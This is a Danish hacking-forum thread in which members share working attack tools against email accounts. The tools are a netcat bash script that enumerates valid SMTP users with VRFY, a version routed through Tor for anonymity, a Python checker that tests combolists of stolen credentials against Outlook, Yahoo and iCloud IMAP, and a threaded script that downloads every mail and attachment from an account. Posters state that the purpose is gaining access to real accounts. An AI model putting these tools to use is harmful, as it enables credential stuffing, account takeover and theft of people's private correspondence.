18-05-2015, 16:16
|
|
iTick
x64 has PIC
|
Indlæg: 648
Registreret: Jul 2013
Omdømme:
47
|
|
Test af valide brugere via SMTP og VRFY fra linux bash
Hvis man har brug for at teste om en bruger har en mailkonto på en given mail server, kan man bruge nedenstående script til at teste om brugeren findes.
Scriptet kaldes med:
Citer:./mailusers.sh users.txt mail.example.com > valid.txt
Filen users.txt har en liste af formodede gyldige brugernavne. Måske er disse gættet, rippet fra en hjemmeside, fundet med TheHarvester, eller lign.
mail.example.com er den mailserver man ønsker at teste op i mod.
Outputtet bliver sendt til filen "valid.txt".
#!/bin/bash
# Kaldes med ./mailusers.sh <userlist> <mailserver> > output.txt
for user in $(cat $1);
do
echo "vrfy $user" | nc -q 2 $2 25 | grep "^252 " | cut -f3 -d" " &
done
mailusers.sh skal selvfølgelig gøres eksekverbar med:
Citer:$ chmod u+x mailusers.sh
Jeg håber nogen kan bruge det. Det er sådan set ret simpelt.
Når scriptet er forbundet til mail serveren med netcat på port 25, udsteder det en "vrfy <brugernavn>".
Hvis brugeren findes, giver mail serveren en returkode "252", hvilket betyder at brugeren findes og hvis brugeren ikke findes, gives en returkode "550".
---
Writing a shellcode decoder stub in assembly is like talking gibberish in such a way that it is still perfectly intelligible. - iTick
|
|
18-05-2015, 19:37
|
|
iTick
x64 has PIC
|
Indlæg: 648
Registreret: Jul 2013
Omdømme:
47
|
|
RE: Test af valide brugere via SMTP og VRFY fra linux bash
(18-05-2015, 19:08)Doctor Blue Skrev: Jeg havde egentlig ikke tænkt over at der var en kommando til det. Det giver naturligvis mening, da det betyder, at servere ikke begynder at sende hele e-mailen hvis mailboksen alligevel ikke eksisterer.
Ja det er sådan set ret praktisk. Også selv om det kan misbruges.
---
Writing a shellcode decoder stub in assembly is like talking gibberish in such a way that it is still perfectly intelligible. - iTick
|
|
18-05-2015, 21:14
|
|
Spagnum
Arrangør
|
Indlæg: 677
Registreret: Mar 2013
Omdømme:
24
|
|
RE: Test af valide brugere via SMTP og VRFY fra linux bash
Ganske smart... har noget pyton kode som gør det samme, men endnu nemmere direkte fra bash..
Don't learn to hack, hack to learn
|
|
18-05-2015, 21:18
|
|
iTick
x64 has PIC
|
Indlæg: 648
Registreret: Jul 2013
Omdømme:
47
|
|
RE: Test af valide brugere via SMTP og VRFY fra linux bash
(18-05-2015, 21:14)Spagnum Skrev: Ganske smart... har noget pyton kode som gør det samme, men endnu nemmere direkte fra bash..
Hvis det er noget du vil dele, må du gerne det. Jeg har også nok også en Python udgave, men det ville være rart at se, hvordan andre gør det.
I sær hvis den er simpel. :)
---
Writing a shellcode decoder stub in assembly is like talking gibberish in such a way that it is still perfectly intelligible. - iTick
|
|
18-05-2015, 21:33
(Denne besked var sidst ændret: 19-05-2015, 10:56 af Spagnum.)
|
|
Spagnum
Arrangør
|
Indlæg: 677
Registreret: Mar 2013
Omdømme:
24
|
|
RE: Test af valide brugere via SMTP og VRFY fra linux bash
Det er ikke noget jeg selv har kodet, fandt det på nettet engang men skal lige finde det frem ved lejlighed :)
Edit:
Den lå her allerede:
https://shellsec.pw/traad-accountchecker
Don't learn to hack, hack to learn
|
|
19-05-2015, 15:13
(Denne besked var sidst ændret: 19-05-2015, 15:13 af Doctor Blue.)
|
|
Doctor Blue
Administrator
|
Indlæg: 2.343
Registreret: Feb 2013
Omdømme:
51
|
|
RE: Test af valide brugere via SMTP og VRFY fra linux bash
(18-05-2015, 21:33)Spagnum Skrev: Det er ikke noget jeg selv har kodet, fandt det på nettet engang men skal lige finde det frem ved lejlighed :)
Edit:
Den lå her allerede:
https://shellsec.pw/traad-accountchecker
Ah ja, men din tester brugernavn/password kombinationer. iTicks tjekker kun om mailboxen eksisterer :)
Hvis vi er ude i at dele den slags, så har jeg også lavet et par scripts. Det sidste af disse har også threading for at speede det lidt op.
check_email.py (Tjekker kombolister mod et par forskellige free hosts)
#!/usr/bin/python
# This tool checks user/pass combinations against common mail servers
import os
import poplib
import imaplib
import email
import quopri
import datetime
import uuid
import socket
import re
import string
# Some services are skipped on purpose because they are impossible or
# a waste of time, namely:
# - GMail - POP/IMAP must be enabled from the website
# - Stofanet - Username is not related to the email address, can't be guessed
# - TDC - Users have random passwords on registration
providers = {
'Outlook': {
'proto': 'IMAP',
'server': 'imap-mail.outlook.com',
'port': 993,
'domains': ['live.com', 'live.dk', 'hotmail.com', 'hotmail.dk', 'msn.com', 'msn.dk', 'outlook.com', 'outlook.dk']
},
'Yahoo': {
'proto': 'IMAP',
'server': 'imap.mail.yahoo.com',
'port': 993,
'domains': ['yahoo.com', 'yahoo.dk', 'ymail.com', 'rocketmail.com']
},
'iCloud': {
'proto': 'IMAP',
'server': 'imap.mail.me.com',
'port': 993,
'domains': ['me.com', 'icloud.com', 'mac.com'],
}
}
autoflush = True # Flush on every write to outfile
infilename = "combolist.txt"
outfilename = "working-mails.txt"
# Find the provider for a given domain
def getprovider(address):
domain = address.split("@")[-1]
for provider in providers:
provider = providers[provider]
if domain in provider['domains']:
return provider
return False
# Check a POP3 account
def trypop(server, port, address, password):
conn = poplib.POP3_SSL(server, port)
conn.user(address)
try:
conn.pass_(password)
except (UnicodeEncodeError, poplib.error_proto) as ex:
print(ex)
return False
conn.quit()
return True
# Check an IMAP4 account
def tryimap(server, port, address, password):
conn = imaplib.IMAP4_SSL(server, port)
try:
conn.login(address, password)
conn.logout()
except (UnicodeEncodeError, imaplib.IMAP4.error) as ex:
print(ex)
return False
return True
# Determine protocol and call appropriate function
def trymail(provider, user):
if provider['proto'] == "IMAP":
return tryimap(provider['server'], provider['port'], user[0], user[1])
elif provider['proto'] == "POP":
return trypop(provider['server'], provider['port'], user[0], user[1])
else:
return False
infile = open(infilename, 'r')
with open(outfilename, 'a') as outfile:
for address in infile:
address = address.rstrip()
if "@" in address:
user = address.split(":")
provider = getprovider(user[0])
if not provider:
print("SKIP - " + address)
elif trymail(provider, user):
print("OKAY - " + address)
outfile.write(address + "\n")
if autoflush: outfile.flush()
else:
print("FAIL - " + address)
dump_email.py (Dumper alle brugerens mails via IMAP)
#!/usr/bin/python
# Standard libraries
import os
import re
import uuid
import email
import imaplib
import datetime
import threading
# Non-standard libraries (Must be installed)
import imapclient
# Script settings
imaplib._MAXLINE = 1000000 # Disregard imaplib's 10K byte limit by overriding to 1M
basedir = "E-mails" # Base directory for downloaded mails
alphanumrx = re.compile('[\W_]+') # Regex for removing non-alphanumeric characters from a string
server = "imap-mail.outlook.com"
port = 993
user = ""
password = ""
# Utility functions
def split_seq(seq, num_pieces):
start = 0
for i in range(num_pieces):
stop = start + len(seq[i::num_pieces])
yield seq[start:stop]
start = stop
# Class definition
class IMAPDumper:
def __init__(self, server, port, username, password):
# Connection info
self.server = server
self.port = port
self.username = username
self.password = password
self.mailbox = None # Current mailbox, used when reconnecting
self.mboxdir = None
self.connect()
def connect(self):
self.conn = imapclient.IMAPClient(self.server, self.port, ssl=True)
self.conn.login(self.username, self.password)
if self.mailbox is not None:
self.conn.select_folder(self.mailbox, readonly=True)
def reconnect(self, error):
print("Connection failed: %s" % error)
print("Reconnecting")
self.connect()
def enumerateMailboxes(self):
print("Getting mailbox list")
mailboxes = self.conn.list_folders()
# Filter out strings I don't understand
mailboxes2 = []
for mailbox in mailboxes:
if not isinstance(mailbox, str):
mailboxes2.append(mailbox[2])
return mailboxes2
def enumerateMails(self, mailbox):
# Get UIDs for mails in mailbox
print("Enumerating mails in %s" % mailbox)
self.setMailbox(mailbox)
while True:
try:
maillist = self.conn.search(['ALL'])
break
except (imaplib.error, imapclient.IMAPClient.Error) as ex:
self.reconnect(ex)
# Create a directory to download the mails into if it doesn't already exist
if not os.path.exists(self.mboxdir):
os.makedirs(self.mboxdir)
print(" Added %d to queue" % len(maillist))
return maillist
def setMailbox(self, mailbox):
self.conn.select_folder(mailbox, readonly=True)
self.mailbox = mailbox
self.mboxdir = os.path.join(basedir, self.username, self.mailbox)
def fetchMail(self, mailid):
while True:
try:
filename = os.path.join(self.mboxdir, str(mailid) + ".txt")
# Check if mail is already downloaded
if not os.path.exists(filename) or os.path.getsize(filename) == 0:
# Download and save e-mail
mail = self.conn.fetch(mailid, ['BODY.PEEK[]'], None)[mailid]['BODY[]']
with open(filename, "w", encoding="utf-8") as f:
f.write(mail)
# Save attachments to seperate file
self.saveAttachments(mailid, mail)
break
except Exception as ex:
raise
#self.reconnect(ex)
def saveAttachments(self, uid, mailtext):
mail = email.message_from_string(mailtext)
for part in mail.walk():
# Determine if part is an attachment
if part.get_content_maintype() == 'multipart' or part.get('Content-Disposition') is None:
continue
# Get extension and generate random filename (.bin on unknown MIME type)
filename = part.get_filename()
if filename is None:
filename = str(uuid.uuid4()) + ".bin"
else:
ext = alphanumrx.sub('', filename.split(".")[-1])
filename = str(uuid.uuid4()) + "." + ext
# Write attachment to file
filepath = os.path.join(self.mboxdir, str(uid) + "_" + filename)
with open(filepath, 'bw') as f:
try:
f.write(part.get_payload(decode=True))
except AssertionError as ex:
pass
# Worker class for multithreading
class Worker(threading.Thread):
def __init__(self, server, port, user, password, mailbox, maillist):
threading.Thread.__init__(self)
self.maillist = maillist
def run(self):
self.dumper = IMAPDumper(server, port, user, password)
self.dumper.setMailbox(mailbox)
for mailid in self.maillist:
print("Fetching %d" % mailid)
self.dumper.fetchMail(mailid)
# Run script
print("Starting...")
dumper = IMAPDumper(server, port, user, password)
mailboxes = dumper.enumerateMailboxes()
for mailbox in mailboxes:
maillist = dumper.enumerateMails(mailbox)
### THREADED APPROACH
print("Starting worker threads")
threads = []
for list in split_seq(maillist, 25):
threads.append(Worker(server, port, user, password, mailbox, list))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
### UNTHREADED APPROACH
#mailcounter = 0
#for mailid in maillist:
# mailcounter += 1
# print("[%d/%d] Fetching %d\r" % (mailcounter, len(maillist), mailid), end="")
# dumper.fetchMail(mailid)
|
|
19-05-2015, 15:29
(Denne besked var sidst ændret: 19-05-2015, 15:38 af iTick.)
|
|
iTick
x64 has PIC
|
Indlæg: 648
Registreret: Jul 2013
Omdømme:
47
|
|
RE: Test af valide brugere via SMTP og VRFY fra linux bash
Nice. :) You are the master. I bow to you Doctor Blue. :)
Som du siger, så leder mit mini script kun efter gyldige mailboxes.
Så jeg kun bruger tid på at opnå adgang til de konti der rent faktisk eksisterer.
#!/bin/bash
# Af iTick
# Kaldes med ./mailusers.sh <userlist> <server ip> > output.txt
for user in $(cat $1);
do
echo "vrfy $user" | proxychains nc -n -w 4 $2 25 | grep "^252 " | cut -f3 -d" " &
done
Ovenstående er ikke specielt stabil, men den virker gennem Tor.
Den har lidt problemer med DNS opslaget, så jeg valgt, den kun skal virke på IP adressen og tilføjet -n til netcat.
Tor skal selvfølgelig være installeret.
På Kali:
Citer:# apt-get install tor
# service tor start
Og så skal /etc/proxychains.conf sættes til:
Citer:socks4 127.0.0.1 9050
Hvis nogen har en bedre metode, hører jeg gerne jeres idéer.
---
Writing a shellcode decoder stub in assembly is like talking gibberish in such a way that it is still perfectly intelligible. - iTick
|
|
|